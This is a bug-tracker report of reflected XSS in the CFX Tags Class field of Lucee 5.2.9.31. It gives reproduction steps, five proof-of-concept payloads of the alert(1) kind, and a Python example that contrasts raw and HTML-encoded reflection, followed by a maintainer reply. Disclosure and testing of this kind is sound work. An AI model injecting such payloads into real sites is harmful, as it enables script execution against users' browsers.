XSS in CFX Tags in Lucee 5.2.9.31

Description

There are a few reflected XSS issues in the CFX Tags caused by insufficient XSS filtering of user input.

Steps to reproduce:
1. In the Name field -> add anything.
2. In the Class field -> add the XSS payload.

I found 5 valid XSS payloads, which are:
<img src=""onerror="alert(1)"/>
'<img src=x onerror=alert(1)>
<img src=x onerror=alert()>
"><svg onload=alert(1)>
<><img src=1 onerror=alert(1337)>

BTW, is there any information about HTTP smuggling, the jQuery issue and clickjacking in this issue's development? Because I found some of them in this Lucee version. I tested on:
CentOS 7.6 (Linux (3.10.0-957.5.1.el7.x86_64) 64bit)
Apache Tomcat/8.5.33
Java 1.8.0_181 (64 Bit)

thanks
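To show what these reflections hand the browser and what HTML output encoding does to them, here is an added example in Python (not Lucee's code): the row template and the scanner are hypothetical stand-ins for the admin page, and the five payloads are the ones listed above.

```python
# Added example, not Lucee's code: reflects the report's five payloads into a hypothetical
# admin-page row unencoded (as reported) and HTML-encoded (as a fix would), then checks
# which version hands the browser injected elements or event-handler attributes.
import html
from html.parser import HTMLParser

# The payloads listed in the report, embedded here as test input.
PAYLOADS = [
    '<img src=""onerror="alert(1)"/>',
    "'<img src=x onerror=alert(1)>",
    '<img src=x onerror=alert()>',
    '"><svg onload=alert(1)>',
    '<><img src=1 onerror=alert(1337)>',
]
# Hypothetical row template: the Class value lands in an attribute and in element text.
ROW_TEMPLATE = '<tr><td><input name="class" value="{cls}"></td><td>{cls}</td></tr>'
TEMPLATE_TAGS = {"tr", "td", "input"}  # elements the template legitimately emits

class ActiveMarkupScanner(HTMLParser):
    """Records every element the browser would create and every on* handler attribute."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]

def render_vulnerable(cls: str) -> str:
    """Reflect the user-supplied Class string unencoded (the reported behaviour)."""
    return ROW_TEMPLATE.format(cls=cls)

def render_encoded(cls: str) -> str:
    """Reflect the same value HTML-encoded; quote=True also encodes ' and " so the
    attribute context cannot be broken out of."""
    return ROW_TEMPLATE.format(cls=html.escape(cls, quote=True))

def injected_markup(rendered: str) -> list:
    """Elements beyond the template's own plus any event-handler attributes, i.e. what a
    browser would execute. An empty list means the reflected value was inert."""
    scanner = ActiveMarkupScanner()
    scanner.feed(rendered)
    scanner.close()
    return [t for t in scanner.tags if t not in TEMPLATE_TAGS] + scanner.handlers

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r:40} raw={injected_markup(render_vulnerable(p))} "
              f"encoded={injected_markup(render_encoded(p))}")
```

Running it lists an injected element and an on* handler for every payload in the raw rendering and an empty list for every payload in the encoded rendering.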

Environment

None

Activity

Zac Spitzer
September 8, 2020, 11:53 AM

CFX are no longer supported in 5.3; the whole underlying XSS issue is LDEV-3050.

Ami
September 10, 2020, 6:00 AM

OK, thanks for the info.

thanks

Assignee

Unassigned

Reporter

Ami

Priority

New

Labels

Fix versions

None

Affects versions
